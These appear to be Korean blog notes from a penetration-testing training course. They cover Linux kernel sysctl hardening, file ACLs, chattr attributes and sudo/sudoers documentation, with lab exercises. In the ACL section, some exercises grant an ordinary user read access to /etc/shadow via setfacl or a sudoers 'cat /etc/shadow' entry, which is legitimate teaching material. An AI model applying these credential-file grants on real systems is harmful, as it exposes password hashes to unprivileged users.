net.ipv4.conf.default.rp_filter = 1

net.ipv4.conf.default.accept_source_route = 0

kernel.sysrq = 0

kernel.core_uses_pid = 1

net.ipv4.tcp_syncookies = 1

kernel.msgmnb = 65536

kernel.msgmax = 65536

kernel.shmmax = 4294967295

kernel.shmall = 268435456

# sysctl -a | grep ip_forward

net.ipv4.ip_forward = 1

# cat /proc/sys/net/ipv4/ip_forward

1

(2) /etc/sysctl.conf 파일

# rpm -qa | grep kernel

kernel-2.6.18-411.el5

kernel-2.6.18-194.el5

kernel-headers-2.6.18-411.el5

kernel-2.6.18-411.el5 : 커널 패키지

kernel-headers-2.6.18-411.el5 : 커널 소스코드(EX: 컴파일해서 사용하는 드라이버 설치시필요)

# yum -y install kernel-doc

-> 출력내용 생략

# rpm -ql kernel-doc | grep sysctl

/usr/share/doc/kernel-doc-2.6.18/Documentation/networking/ip-sysctl.txt

/usr/share/doc/kernel-doc-2.6.18/Documentation/networking/ipvs-sysctl.txt

/usr/share/doc/kernel-doc-2.6.18/Documentation/sysctl

/usr/share/doc/kernel-doc-2.6.18/Documentation/sysctl/README

/usr/share/doc/kernel-doc-2.6.18/Documentation/sysctl/abi.txt

/usr/share/doc/kernel-doc-2.6.18/Documentation/sysctl/fs.txt

/usr/share/doc/kernel-doc-2.6.18/Documentation/sysctl/kernel.txt

/usr/share/doc/kernel-doc-2.6.18/Documentation/sysctl/sunrpc.txt

/usr/share/doc/kernel-doc-2.6.18/Documentation/sysctl/vm.txt

■ /etc/sysctl.conf example file

# The following is suitable for dedicated web server, mail, ftp server etc.

# ---------------------------------------

# BOOLEAN Values:

# a) 0 (zero) - disabled / no / false

# b) Non zero - enabled / yes / true

# --------------------------------------

# Controls IP packet forwarding

net.ipv4.ip_forward = 0

# Controls source route verification

net.ipv4.conf.default.rp_filter = 1

# Do not accept source routing

net.ipv4.conf.default.accept_source_route = 0

# Controls the System Request debugging functionality of the kernel

kernel.sysrq = 0

# Controls whether core dumps will append the PID to the core filename

# Useful for debugging multi-threaded applications

kernel.core_uses_pid = 1

# Controls the use of TCP syncookies

#net.ipv4.tcp_syncookies = 1

net.ipv4.tcp_synack_retries = 2

########## IPv4 networking start ##############

# Send redirects, if router, but this is just server

net.ipv4.conf.all.send_redirects = 0

net.ipv4.conf.default.send_redirects = 0

# Accept packets with SRR option? No

net.ipv4.conf.all.accept_source_route = 0

# Accept Redirects? No, this is not router

net.ipv4.conf.all.accept_redirects = 0

net.ipv4.conf.all.secure_redirects = 0

# Log packets with impossible addresses to kernel log? yes

net.ipv4.conf.all.log_martians = 1

net.ipv4.conf.default.accept_source_route = 0

net.ipv4.conf.default.accept_redirects = 0

net.ipv4.conf.default.secure_redirects = 0

# Ignore all ICMP ECHO and TIMESTAMP requests sent to it via broadcast/multicast

net.ipv4.icmp_echo_ignore_broadcasts = 1

# Prevent against the common 'syn flood attack'

net.ipv4.tcp_syncookies = 1

# Enable source validation by reversed path, as specified in RFC1812

net.ipv4.conf.all.rp_filter = 1

net.ipv4.conf.default.rp_filter = 1

########## IPv6 networking start ##############

# Number of Router Solicitations to send until assuming no routers are present.

# This is host and not router

net.ipv6.conf.default.router_solicitations = 0

# Accept Router Preference in RA?

net.ipv6.conf.default.accept_ra_rtr_pref = 0

# Learn Prefix Information in Router Advertisement

net.ipv6.conf.default.accept_ra_pinfo = 0

# Setting controls whether the system will accept Hop Limit settings from a router advertisement

net.ipv6.conf.default.accept_ra_defrtr = 0

#router advertisements can cause the system to assign a global unicast address to an interface

net.ipv6.conf.default.autoconf = 0

#how many neighbor solicitations to send out per address?

net.ipv6.conf.default.dad_transmits = 0

# How many global unicast IPv6 addresses can be assigned to each interface?

net.ipv6.conf.default.max_addresses = 1

########## IPv6 networking ends ##############

#Enable ExecShield protection

kernel.exec-shield = 1

kernel.randomize_va_space = 1

# TCP and memory optimization

# increase TCP max buffer size setable using setsockopt()

#net.ipv4.tcp_rmem = 4096 87380 8388608

#net.ipv4.tcp_wmem = 4096 87380 8388608

# increase Linux auto tuning TCP buffer limits

#net.core.rmem_max = 8388608

#net.core.wmem_max = 8388608

#net.core.netdev_max_backlog = 5000

#net.ipv4.tcp_window_scaling = 1

# increase system file descriptor limit

fs.file-max = 65535

#Allow for more PIDs

kernel.pid_max = 65536

#Increase system IP port limits

net.ipv4.ip_local_port_range = 2000 65000

참고사이트

http://www.cyberciti.biz/faq/linux-kernel-etcsysctl-conf-security-hardening/

저작자표시 비영리 변경금지

'모의해킹 침해대응 전문가 과정' 카테고리의 다른 글

20160819 프로젝트#4 + 피드백 (0)	2016.08.19
20160805 Sophos UTM (0)	2016.08.05
20160804 ACL(Access Control List) (0)	2016.08.04
20160804 Linux and Unix sudo command (0)	2016.08.04
20160804 SELinux (0)	2016.08.04

Posted by 22Hz

, |

20160804 ACL(Access Control List)

모의해킹 침해대응 전문가 과정 / 2016. 8. 4. 21:52

ACL(Access Control List)

ACL은 파일과 디렉토리의 확장 속성 중에 하나이다. setfacl 명령어를 사용해서 파일의 소유자나 그룹을 더 만들수 있다. 또한 확장 속성의 정보를 확인 하기 위해서 getfacl 명령어를 사용할 수 있다. 파일의 확장 속성은 Shadow Inode에 저장되어 있다.

[그림] Shadow Inode

inode : 파일의 기본 속성 정보 (ls -l하면 보이는 정보)

Shadow Inode : 파일의 확장 속성 정보

원래는 file1을 user01, user02 등의 사용자가 변경하고 싶으면 group의 권한에 사용자를 추가해주면 되지만 각각의 사용자 마다의 권한을 달리해줄수는 없었다. 파일에 대한 ACL 설정을 통해서 file1에 대해서 소유자를 root 사용자 외에도 user01, user02 등 다중 사용자가 소유할수 있도록 설정할수 있다. 또한 그룹에 관해서도 추가로 속하도록 설정할수 있다.

# ls -l file1

-rw-r--r-- 1 root root 0 Mar 23 19:23 file1

file1 소유권 : root + user01 + ....

file1 그룹권 : other + class1 + ....

setfacl 명령어는 기본적으로 chmod 명령어와 같은 역할을 가진다. Permission Mode를 변경 하는 역할을 갖는것이다. chmod 명령어는 파일에 대한 사용권한이나 그룹권한이 하나로 정해져 있지만 setfacl 명령어를 사용하면, 파일에 대한 사용권한이나 그룹권한을 늘려 줄 수 있다.

getfacl(get file access control list) /* 파일의 확장 속성정보를 보여주는 명령어 */

setfacl(set file access control list) /* 파일의 확장 속성정보를 설정하는 명령어 */

# man getfacl

NAME

getfacl - get file access control lists

SYNOPSIS

getfacl [-dRLPvh] file ...

getfacl [-dRLPvh] -

DESCRIPTION

For each file, getfacl displays the file name, owner, the group, and

the Access Control List (ACL). If a directory has a default ACL, get-

facl also displays the default ACL. Non-directories cannot have default

ACLs.

If getfacl is used on a file system that does not support ACLs, getfacl

displays the access permissions defined by the traditional file mode

permission bits.

The output format of getfacl is as follows:

1: # file: somedir/

2: # owner: lisa

3: # group: staff

4: user::rwx

5: user:joe:rwx #effective:r-x

6: group::rwx #effective:r-x

7: group:cool:r-x

8: mask:r-x

9: other:r-x

10: default:user::rwx

11: default:user:joe:rwx #effective:r-x

12: default:group::r-x

13: default:mask:r-x

14: default:other:---

Lines 4, 6 and 9 correspond to the user, group and other fields of the

file mode permission bits. These three are called the base ACL entries.

Lines 5 and 7 are named user and named group entries. Line 8 is the

effective rights mask. This entry limits the effective rights granted

to all groups and to named users. (The file owner and others permis-

sions are not affected by the effective rights mask; all other entries

are.) Lines 10--14 display the default ACL associated with this direc-

tory. Directories may have a default ACL. Regular files never have a

default ACL.

The default behavior for getfacl is to display both the ACL and the

default ACL, and to include an effective rights comment for lines where

the rights of the entry differ from the effective rights.

If output is to a terminal, the effective rights comment is aligned to

column 40. Otherwise, a single tab character separates the ACL entry

and the effective rights comment.

The ACL listings of multiple files are separated by blank lines. The

output of getfacl can also be used as input to setfacl.

PERMISSIONS

Process with search access to a file (i.e., processes with read access

to the containing directory of a file) are also granted read access to

the file’s ACLs. This is analogous to the permissions required for

accessing the file mode.

[명령어 형식]

# getfacl file1

# getfacl file1 file2

[명령어 옵션]

옵션	설명
-d	기본 정보에 대해 확인
-R	recursive의 약자로 디렉토리의 경우 하위 디렉토리 내용까지 확인 가능

# man setfacl

NAME

setfacl - set file access control lists

SYNOPSIS

setfacl [-bkndRLPvh] [{-m|-x} acl_spec] [{-M|-X} acl_file] file ...

setfacl --restore=file

DESCRIPTION

This utility sets Access Control Lists (ACLs) of files and directories.

On the command line, a sequence of commands is followed by a sequence

of files (which in turn can be followed by another sequence of com-

mands, ...).

The options -m, and -x expect an ACL on the command line. Multiple ACL

entries are separated by comma characters (‘,’). The options -M, and -X

read an ACL from a file or from standard input. The ACL entry format is

described in Section ACL ENTRIES.

The --set and --set-file options set the ACL of a file or a directory.

The previous ACL is replaced. ACL entries for this operation must

include permissions.

The -m (--modify) and -M (--modify-file) options modify the ACL of a

file or directory. ACL entries for this operation must include permis-

sions.

The -x (--remove) and -X (--remove-file) options remove ACL enries.

Only ACL entries without the perms field are accepted as parameters,

unless POSIXLY_CORRECT is defined.

When reading from files using the -M, and -X options, setfacl accepts

the output getfacl produces. There is at most one ACL entry per line.

After a Pound sign (‘#’), everything up to the end of the line is

treated as a comment.

If setfacl is used on a file system which does not support ACLs, set-

facl operates on the file mode permission bits. If the ACL does not fit

completely in the permission bits, setfacl modifies the file mode per-

mission bits to reflect the ACL as closely as possible, writes an error

message to standard error, and returns with an exit status greater than

0.

EXAMPLES

Granting an additional user read access

setfacl -m u:lisa:r file

Revoking write access from all groups and all named users (using the

effective rights mask)

setfacl -m m::rx file

Removing a named group entry from a file’s ACL

setfacl -x g:staff file

Copying the ACL of one file to another

getfacl file1 | setfacl --set-file=- file2

Copying the access ACL into the Default ACL

getfacl --access dir | setfacl -d -M- dir

[명령어 형식]

# setfacl -m [acl] file1 /* -m: modify */

# setfacl -x [acl] file1 /* -x: delete */

[명령어 옵션]

옵션	설명
-m	modify의 약자로 권한을 지정하거나 수정할 때 사용
-x	권한을 삭제할 때 사용
-R	recursive의 약자로 디렉토리의 경우 하위 디렉토리와 파일까지 권한을 변경
-b	권한 및 mask 등 지정한 권한을 전부 제거

[EX] 파일의 속성정보중 사용자와 그룹에 대한 정보 변경 및 삭제

■ 사용시스템

- linux200

chmod CMD = setfacl -m

(linux200)

# cd /test

# rm -rf /test/*

# touch file1

# ls -l file1

-rw-r--r-- 1 root root 0 6월 14 14:19 file1

# getfacl file1

# file: file1

# owner: root

# group: root

user::rw-

group::r--

other::r--

# chmod 664 file1

# ls -l file1

-rw-rw-r-- 1 root root 0 1월 27 03:51 file1

# getfacl file1

# file: file1

# owner: root

# group: root

user::rw-

group::rw-

other::r--

# setfacl -m user::rwx file1

# ls -l file1

-rwxrw-r-- 1 root root 0 1월 27 03:51 file1

# getfacl file1

# file: file1

# owner: root

# group: root

user::rwx

group::rw-

other::r--

[EX] 파일에 대한 새로운 사용자 추가 및 그룹 추가

# setfacl -m user::rwx file1

# setfacl -m u::7 file1

user = u

group = g

other = o

rwx = 7

r-- = 4

# getfacl file1

# file: file1

# owner: root

# group: root

user::rwx

group::rw-

other::r--

# setfacl -m u:user01:7 file1

# ls -l file1

-rwxrwxr--+ 1 root root 0 1월 27 03:51 file1

# getfacl file1

# file: file1

# owner: root

# group: root

user::rwx

user:user01:rwx

group::rw-

mask::rwx

other::r--

# groupadd class1

# grep class /etc/group

# setfacl -m g:class1:7 file1

# getfacl file1

# file: file1

# owner: root

# group: root

user::rwx

user:user01:rwx

group::rw-

group:class1:rwx

mask::rwx

other::r--

# setfacl -x u:user01 file1 (# setfacl –x u:user01:rwx file1)

# getfacl file1

# file: file1

# owner: root

# group: root

user::rwx

group::rw-

group:class1:rwx

mask::rwx

other::r--

# setfacl -x g:class1 file1

# getfacl file1

# file: file1

# owner: root

# group: root

user::rwx

group::rw-

mask::rw-

other::r--

[EX] root 사용자의 파일을 일반사용자(예: user01)가 쓸수 있도록 설정

# cd /test

# rm -rf /test/*

# echo 1111 > file1

# ls -l file1

-rw-r--r-- 1 root root 5 Oct 15 21:02 file1

# setfacl -m u:user01:7 file1

# getfacl file1

# file: file1

# owner: root

# group: root

user::rw-

user:user01:rwx

group::r--

mask::rwx

other::r--

# su user01

$ echo 2222 >> file1

$ cat file1

1111

2222

$ exit

#

[EX] 확장 속성정보를 동일하게 유지하는 파일 만들기

# cd /test

# rm -rf /test/*

# touch file1 file2 file3 file4

# setfacl -m u:user01:7 file1

# getfacl file1

# file: file1

# owner: root

# group: root

user::rwx

user:user01:rwx

group::r--

mask::rwx

other::r--

# getfacl file1 > file.acl

# setfacl --set-file=file.acl file2

# getfacl file1 | setfacl --set-file=- file2

# getfacl file1 file2

# file: file1

# owner: root

# group: root

user::rw-

user:user01:rwx

group::r--

mask::rwx

other::r--

# file: file2

# owner: root

# group: root

user::rw-

user:user01:rwx

group::r--

mask::rwx

other::r--

[EX] mask, effecitvie 값에 대해서

---------------------------

# file: file1

# owner: root

# group: root

user::rw-

user:user01:rwx

group::r--

group:class1:rwx

mask::rwx

other::r--

---------------------------

# cd /test

# rm -rf /test/*

# echo 1111 > file1

# getfacl file1

# setfacl -m u:user01:7 file1

# setfacl -m g:class1:7 file1

# getfacl file1

# setfacl -m m::6 file1

# getfacl file1

# setfacl -m m::1 file1

# getfacl file1

[EX] 디렉토리의 확장 속성정보(Default ACL)

# mkdir dir1

# setfacl -m d:u::7,d:g::5,d:o::5 dir1 (# setfacl -m d:u::rwx,d:g::r-x,d:o:r-x dir1)

# ls -ld dir1

drwxr-xr-x+ 2 root root 4096 1월 27 04:14 dir1

# getfacl dir1

# file: dir1

# owner: root

# group: root

user::rwx

group::r-x

other::r-x

default:user::rwx

default:group::r-x

default:other::r-x

# setfacl -m d:u:user01:7,d:m::5 dir1 (# setfacl -m default:user:user01:rwx,d:m::r-x dir1)

# getfacl dir1

# file: dir1

# owner: root

# group: root

user::rwx

group::r-x

other::r-x

default:user::rwx

default:user:user01:rwx #effective:r-x

default:group::r-x

default:mask::r-x

default:other::r-x

# mkdir dir1/subdir1

# getfacl dir1/subdir1

# file: dir1/subdir1

# owner: root

# group: root

user::rwx

user:user01:rwx #effective:r-x

group::r-x

mask::r-x

other::r-x

default:user::rwx

default:user:user01:rwx #effective:r-x

default:group::r-x

default:mask::r-x

default:other::r-x

# setfacl -m d:u::7,d:g::7,d:o::7,d:m::7 dir1

# setfacl -m d:u::rwx,d:group::rwx,d:other:rwx,d:mask:rwx dir1

# getfacl dir1

# file: dir1

# owner: root

# group: root

user::rwx

group::r-x

other::r-x

default:user::rwx

default:user:user01:rwx

default:group::rwx

default:mask::rwx

default:other::rwx

# getfacl dir1/subdir1

# file: dir1/subdir1

# owner: root

# group: root

user::rwx

user:user01:rwx #effective:r-x

group::r-x

mask::r-x

other::r-x

default:user::rwx

default:user:user01:rwx #effective:r-x

default:group::r-x

default:mask::r-x

default:other::r-x

# mkdir dir1/subdir2

# getfacl dir1/subdir2

# file: dir1/subdir2

# owner: root

# group: root

user::rwx

user:user01:rwx

group::rwx

mask::rwx

other::rwx

default:user::rwx

default:user:user01:rwx

default:group::rwx

default:mask::rwx

default:other::rwx

[추가적인 실습]

■ 목표

/test/dir1/file1

-> user01 (r)

-> user02 (rw)

-> user03 (rwx)

① 파일생성

# vi /test/dir1/file1

--------------------------

#!/bin/bash

echo "test messages"

--------------------------

# chmod 700 /test/dir1/file1

# ls -l /test/dir1/file1

-rwx------ 1 root root 33 Jun 7 11:56 /test/dir1/file1

# /test/dir1/file1

-> 정상적으로 실행된다.

② 사용자 추가

# egrep '(user01|user02|user03)' /etc/passwd

# useradd user01

# useradd user02

# useradd user03

# echo user01 | passwd --stdin user01

# echo user02 | passwd --stdin user02

# echo user03 | passwd --stdin user03

# su - user01

$ cat /test/dir1/file1

$ exit

# setfacl -m u:user01:4 /test/dir1/file1

# setfacl -m u:user02:6 /test/dir1/file1

# setfacl -m u:user03:7 /test/dir1/file1

# getfacl /test/dir1/file1

# file: test/dir1/file1

# owner: root

# group: root

user::rwx

user:user01:r--

user:user02:rw-

user:user03:rwx

group::---

mask::rwx

other::---

# su - user01

(0) $ cat /test/dir1/file1

(X) $ /test/dir1/file1

$ su - user02

(0) $ cat /test/dir1/file1

(0) $ echo "echo test messages2" >> /test/dir1/file1

$ cat /test/dir1/file1

(X) $ /test/dir1/file1

$ su - user03

(0) $ cat /test/dir1/file1

(0) $ /test/dir1/file1

$ exit

[EX] 지정된 일반사용자가 /etc/shadow 파일을 읽을수 있도록 설정

# id

# ls -l /etc/shadow

# setfacl -m u:user01:4 /etc/shadow

# su - user01

$ cat /etc/shadow

(복원) 반드시 /etc/shadow 파일의 설정을 복원한다.

# setfacl -x u:user01 /etc/shadow

[EX] 지정된 사용자만 파일을 못읽게 설정

$ exit

# cd /test

# echo 1111 > file.txt

# chmod 777 file.txt

# setfacl -m u:user01:0 file.txt

# su - user01

$ cat /test/file.txt

Linux 개발하는 경우에 고려사항 허용/차단 target 권한상승

SELinux(RBAC(Role-Based Access Control)) -> 허용 file(user/role/process/securitylevel) X

sudo CMD, /etc/sudoers -> 허용 file(CMD) O

File ACL(getfacl/setfacl) -> 허용 file(user/group) △

lsattr/chattr CMD -> 차단 file(mode) X

ex) i, a

사용자가 실행할 수 있는 CMD1

관리자만 실행할 수 있는 CMD2

사용자가 CMD2를 실행하려고 하면? sudo, role(SELinux, MLS)

사용자가 관리할 수 있는 File1

관리자가 관리할 수 있는 File2

사용자가 File2를 관리하려고 하면? ACL, sudo, user(SELinux)

process(실행중인 프로그램)를 제어하려면? process(SELinux)

# ls -l /etc/shadow

-r-------- 1 root root 1.4K May 24 12:38 /etc/shadow

# su - user01

$ cat /etc/shadow

-> 에러

(해결1) # setfacl -m u:user01:4 /etc/shadow

(해결2) # echo "user01 ALL=/bin/cat /etc/shadow NOPASSWD:ALL" >> /etc/sudoers

■ lsattr CMD / chattr CMD

# man lsattr

NAME

lsattr - list file attributes on a Linux second extended file

system

SYNOPSIS

lsattr [ -RVadv ] [ files... ]

DESCRIPTION

lsattr lists the file attributes on a second extended file

system. See chattr(1) for a description of the attributes and

what they mean.

# cd /test && rm -rf /test/* && touch file1

# lsattr file1

------------- file1

# man chattr

NAME

chattr - change file attributes on a Linux second extended

file system

SYNOPSIS

chattr [ -RV ] [ -v version ] [ mode ] files...

DESCRIPTION

chattr changes the file attributes on a Linux second extended

file system.

The format of a symbolic mode is +-=[ASacDdIijsTtu].

The operator ‘+’ causes the selected attributes to be added to

the existing attributes of the files; ‘-’ causes them to be

removed; and ‘=’ causes them to be the only attributes that

the files have.

ATTRIBUTES

A file with the ‘a’ attribute set can only be open in append

mode for writing. Only the superuser or a process possessing

the CAP_LINUX_IMMUTABLE capability can set or clear this

attribute.

A file with the ‘i’ attribute cannot be modified: it cannot be

deleted or renamed, no link can be created to this file and no

data can be written to the file. Only the superuser or a pro-

cess possessing the CAP_LINUX_IMMUTABLE capability can set or

clear this attribute.

시스템에서 중요한 파일들

/etc/inittab

/etc/passwd

/etc/shadow

/etc/hosts

........

부팅과 상관 있는 파일 : /etc/inittab

목표: /etc/inittab 파일에 추가 가능하도록 설정하기

파일내용 추가가능

파일내용 변경가능

파일내용 삭제가능

파일이름 변경

파일이름 삭제

# mkdir -p /backup

# cp /etc/inittab /backup

# cp /etc/inittab /test

# cd /test

# ls -l inittab

-rw-r--r-- 1 root root 1.7K Jun 7 12:28 inittab

# lsattr inittab

------------- inittab

# chattr +a inittab

# lsattr inittab

-----a------- inittab

파일내용 추가가능

# echo "k:5:once:/etc/rc.local" >> inittab (내용 추가 가능)

파일내용 변경가능

# vi inittab (내용 변경 불가)

파일내용 삭제가능

# vi inittab (내용 삭제 불가)

파일이름 변경

# mv inittab inittab.old (파일 이름 변경 불가)

mv: cannot move `inittab' to `inittab.old': Operation not permitted

파일이름 삭제

# rm -f inittab

rm: cannot remove `inittab': Operation not permitted

# chattr -a inittab

# lsattr inittab

------------- inittab

# chattr +i inittab

# lsattr inittab

----i-------- inittab

파일내용 추가가능

# echo "k:5:once:/etc/rc.local" >> inittab (내용 추가 불가)

파일내용 변경가능

# vi inittab (내용 변경 불가)

파일내용 삭제가능

# vi inittab (내용 삭제 불가)

파일이름 변경

# mv inittab inittab.old (파일 이름 변경 불가)

mv: cannot move `inittab' to `inittab.old': Operation not permitted

파일이름 삭제

# rm -f inittab

rm: cannot remove `inittab': Operation not permitted

# chattr -i inittab

# vi passwd.sh

----------------------------------------

#!/bin/bash

chattr -i /etc/passwd

chattr -i /etc/shadow

passwd.old $*

chattr +i /etc/passwd

----------------------------------------

저작자표시 비영리 변경금지

'모의해킹 침해대응 전문가 과정' 카테고리의 다른 글

20160805 Sophos UTM (0)	2016.08.05
20160805 Linux Kernel Parameter (0)	2016.08.05
20160804 Linux and Unix sudo command (0)	2016.08.04
20160804 SELinux (0)	2016.08.04
20160803 SELinux (0)	2016.08.03

Posted by 22Hz

, |

20160804 Linux and Unix sudo command

모의해킹 침해대응 전문가 과정 / 2016. 8. 4. 19:54

Linux and Unix sudo command

INDEX

---------------------------------------------------

1. sudo CMD

1.1 sudo 명령어 대해서

1.2 sudo 명령어 문법

1.3 sudo 설명

1.4 sudo 명령어 옵션

1.5 sudo 명령어 예제

2. /etc/sudoers file

2.1 /etc/sudoers 파일에 대해서

2.2 리눅스 배포판의 /etc/sudoers 파일 비교

3. sudo 실습

---------------------------------------------------

■ sudo 명령어의 필요성

user01(백업: dump/restore CMD) ----> su CMD ---> root 사용자(dump/restore CMD)

user01(백업: dump/restore CMD) ----> sudo CMD --->

/etc/sudoers

user01 ALL=dump restore

■ sudo 명령어 체계를 사용하면 생기는 장점

(ㄱ) 일반사용자(EX: user01)가 작업시 관리자(EX: root)의 암호를 알 필요가 없다.

(ㄴ) 일반사용자가 관리자 처럼 작업할 수 있는 명령어의 범위가 지정된다.

1. sudo CMD

(1) sudo 대해서

sudo ("superuser do") allows a user with proper permissions to execute a command as another user, such as the superuser.

(2) sudo 문법

sudo -V | -h | -l | -L | -v | -k | -K | -s | [ -H ] [-P ] [-S ] [ -b ] |

[ -p prompt ] [ -c class|- ] [ -a auth_type ] [-r role ] [-t type ]

[ -u username|#uid ] command

(3) sudo 설명

sudo allows a permitted user to execute a command as another user, according to specifications in the /etc/sudoers file. The real and effective uid and gid of the issuing user are then set to match those of the target user account as specified in the passwd file.

By default, sudo requires that users authenticate themselves with a password. By default this is the user's password, not the root password itself.

Once a user has been authenticated, a timestamp is recorded and the user may use sudo without a password for a short period of time (5 minutes, unless configured differently in sudoers). This timestamp can be renewed if the user issues sudo with the -v flag.

If a user not listed in sudoers tries to run a command using sudo, it is considered an unsuccessful attempt to breach system security and mail is sent to the proper authorities, as defined at configure time or in the sudoers file. The default authority to be notified of unsuccessful sudo attempts is root. Note that the mail will not be sent if an unauthorized user tries to run sudo with the -l or -v flags; this allows users to determine for themselves whether or not they are allowed to use sudo.

sudo can log both successful and unsuccessful attempts (as well as errors) to syslog, a unique log file, or both. By default sudo will log to syslog but this can be changed at configure time or in the sudoers file.

(4) sudo OPTIONS

-V 옵션

The -V (version) option causes sudo to print the version number and exit. If the invoking user is already root, the -V option will print out a list of the defaults sudo was compiled with as well as the machine's local network addresses.

-l 옵션

The -l (list) option will print out the commands allowed (and forbidden) the user on the current host.

-L 옵션

The -L (list defaults) option will list out the parameters that may be set in a Defaults line along with a short description for each. This option is useful in conjunction with grep.

-h 옵션

The -h (help) option causes sudo to print a usage message and exit.

-v 옵션

If given the -v (validate) option, sudo will update the user's timestamp, prompting for the user's password if necessary. This extends the sudo timeout for another 5 minutes (or whatever the timeout is set to in sudoers) but does not run a command.

-k 옵션

The -k (kill) option to sudo invalidates the user's timestamp by setting the time on it to the epoch. The next time sudo is run a password will be required. This option does not require a password and was added to allow a user to revoke sudo permissions from a .logout file.

-K 옵션

The -K (sure kill) option to sudo removes the user's timestamp entirely. Likewise, this option does not require a password.

-b 옵션

The -b (background) option tells sudo to run the given command in the background. Note that if you use the -b option you cannot use shell job control to manipulate the process.

-p 옵션

The -p (prompt) option allows you to override the default password prompt and use a custom one. The following percent ('%') escapes are supported:

%u is expanded to the invoking user's login name;

%U is expanded to the login name of the user the command will be run as (which defaults to root);

%h is expanded to the local hostname without the domain name;

%H is expanded to the local hostname including the domain name (only if the machine's hostname is fully qualified or the "fqdn" sudoers option is set);

%% (two consecutive % characters) are collapsed into a single % character.

-c 옵션

The -c (class) option causes sudo to run the specified command with resources limited by the specified login class. The class argument can be either a class name as defined in /etc/login.conf, or a single '-' character. Specifying a class of - indicates that the command should be run restricted by the default login capabilities for the user the command is run as. If the class argument specifies an existing user class, the command must be run as root, or the sudo command must be run from a shell that is already root. This option is only available on systems with BSD login classes where sudo has been configured with the --with-logincap option.

-a 옵션

The -a (authentication type) option causes sudo to use the specified authentication type when validating the user, as allowed by /etc/login.conf. The system administrator may specify a list of sudo-specific authentication methods by adding an "auth-sudo" entry in /etc/login.conf. This option is only available on systems that support BSD authentication where sudo has been configured with the --with-bsdauth option.

-u 옵션

The -u (user) option causes sudo to run the specified command as a user other than root. To specify a uid instead of a username, use #uid.

-s 옵션

The -s (shell) option runs the shell specified by the SHELL environment variable if it is set or the shell as specified in the file passwd.

-H 옵션

The -H (HOME) option sets the HOME environment variable to the home directory of the target user (root by default) as specified in passwd. By default, sudo does not modify HOME.

-P 옵션

The -P (preserve group vector) option causes sudo to preserve the user's group vector unaltered. By default, sudo will initialize the group vector to the list of groups the target user is in. The real and effective group IDs, however, are still set to match the target user.

-r 옵션

The -r (role) option causes the new (SELinux) security context to have the role specified by ROLE.

-t 옵션

The -t (type) option causes the new (SELinux) security context to have the have the type (domain) specified by TYPE. If no type is specified, the default type is derived from the specified role.

-S 옵션

The -S (stdin) option causes sudo to read the password from standard input instead of the terminal device.

-- 옵션

The -- flag indicates that sudo should stop processing command line arguments. It is most useful in conjunction with the -s flag.

(5) sudo CMD Examples

$ sudo -u comphope ls /home/comphope/hope

List the contents of the /home/comphope/hope directory as the comphope user.

$ sudo -v

Extend/reset sudo's automatic authentication timeout, allowing you to continue issuing sudo commands without entering a password.

$ sudo -k

"Kill" sudo authentication for the current user. The next sudo command will require a password.

(6) 참고

http://www.computerhope.com/unix/sudo.htm

2. /etc/sudoers file

(1) /etc/sudoers 파일에 대해서

NAME

sudoers - default sudo security policy module

DESCRIPTION

The sudoers policy module determines a user's sudo privileges. It is the default

sudo policy plugin. The policy is driven by the /etc/sudoers file or, optionally

in LDAP. The policy format is described in detail in the "SUDOERS FILE FORMAT"

section. For information on storing sudoers policy information in LDAP, please

see sudoers.ldap(5).

SUDOERS FILE FORMAT

The sudoers file is composed of two types of entries: aliases (basically

variables) and user specifications (which specify who may run what).

When multiple entries match for a user, they are applied in order. Where there

are multiple matches, the last match is used (which is not necessarily the most

specific match).

The sudoers grammar will be described below in Extended Backus-Naur Form (EBNF).

Don't despair if you don't know what EBNF is; it is fairly simple, and the

definitions below are annotated.

Quick guide to EBNF

EBNF is a concise and exact way of describing the grammar of a language. Each

EBNF definition is made up of production rules. E.g.,

symbol ::= definition | alternate1 | alternate2 ...

Each production rule references others and thus makes up a grammar for the

language. EBNF also contains the following operators, which many readers will

recognize from regular expressions. Do not, however, confuse them with

"wildcard" characters, which have different meanings.

? Means that the preceding symbol (or group of symbols) is optional. That is,

it may appear once or not at all.

* Means that the preceding symbol (or group of symbols) may appear zero or more

times.

+ Means that the preceding symbol (or group of symbols) may appear one or more

times.

Parentheses may be used to group symbols together. For clarity, we will use

single quotes ('') to designate what is a verbatim character string (as opposed

to a symbol name).

Aliases

There are four kinds of aliases: User_Alias, Runas_Alias, Host_Alias and

Cmnd_Alias.

Alias ::= 'User_Alias' User_Alias (':' User_Alias)* |

'Runas_Alias' Runas_Alias (':' Runas_Alias)* |

'Host_Alias' Host_Alias (':' Host_Alias)* |

'Cmnd_Alias' Cmnd_Alias (':' Cmnd_Alias)*

User_Alias ::= NAME '=' User_List

Runas_Alias ::= NAME '=' Runas_List

Host_Alias ::= NAME '=' Host_List

Cmnd_Alias ::= NAME '=' Cmnd_List

NAME ::= [A-Z]([A-Z][0-9]_)*

Each alias definition is of the form

Alias_Type NAME = item1, item2, ...

dgb boulder = (operator) /bin/ls, /bin/kill, /usr/bin/lprm

The user dgb may run /bin/ls, /bin/kill, and /usr/bin/lprm -- but only as

operator. E.g.,

$ sudo -u operator /bin/ls

It is also possible to override a Runas_Spec later on in an entry. If we modify

the entry like so:

dgb boulder = (operator) /bin/ls, (root) /bin/kill, /usr/bin/lprm

Then user dgb is now allowed to run /bin/ls as operator, but /bin/kill and

/usr/bin/lprm as root.

We can extend this to allow dgb to run /bin/ls with either the user or group set

to operator:

dgb boulder = (operator : operator) /bin/ls, (root) /bin/kill, \

/usr/bin/lprm

ray rushmore = NOPASSWD: /bin/kill, /bin/ls, /usr/bin/lprm

ray rushmore = NOPASSWD: /bin/kill, PASSWD: /bin/ls, /usr/bin/lprm

aaron shanty = NOEXEC: /usr/bin/more, /usr/bin/vi

/etc/sudoers example file

# Run X applications through sudo; HOME is used to find the

# .Xauthority file. Note that other programs use HOME to find

# configuration files and this may lead to privilege escalation!

Defaults env_keep += "DISPLAY HOME"

# User alias specification

User_Alias FULLTIMERS = millert, mikef, dowdy

User_Alias PARTTIMERS = bostley, jwfox, crawl

User_Alias WEBMASTERS = will, wendy, wim

# Runas alias specification

Runas_Alias OP = root, operator

Runas_Alias DB = oracle, sybase

Runas_Alias ADMINGRP = adm, oper

# Host alias specification

Host_Alias SPARC = bigtime, eclipse, moet, anchor :\

SGI = grolsch, dandelion, black :\

ALPHA = widget, thalamus, foobar :\

HPPA = boa, nag, python

Host_Alias CUNETS = 128.138.0.0/255.255.0.0

Host_Alias CSNETS = 128.138.243.0, 128.138.204.0/24, 128.138.242.0

Host_Alias SERVERS = master, mail, www, ns

